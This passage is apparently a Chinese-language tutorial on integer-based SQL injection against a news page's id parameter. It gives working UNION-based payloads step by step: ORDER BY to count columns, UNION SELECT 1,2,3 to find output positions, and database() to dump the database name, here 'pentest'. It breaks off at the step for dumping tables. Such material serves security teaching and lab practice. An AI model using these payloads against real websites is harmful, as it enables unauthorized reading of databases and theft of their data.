1、整型
(1)在搜索栏输入:
id = 0(SELECT * FROM news WHERE id = 1)
(2)判断数据库的字段数
0 order by1(2/3)(SELECT * FROM news WHERE id = 0 order by 3)
(3)判断网页上有输出的位置(2/3)
0 union select1,2,3(SELECT * FROM news WHERE id = 0 union select 1,2,3)
(4)爆数据库
0 union select 1,2,database()(SELECT * FROM news WHERE id = 0 union select 1,2,database())
–>pentest
(5)爆数据表
0 union select 1,2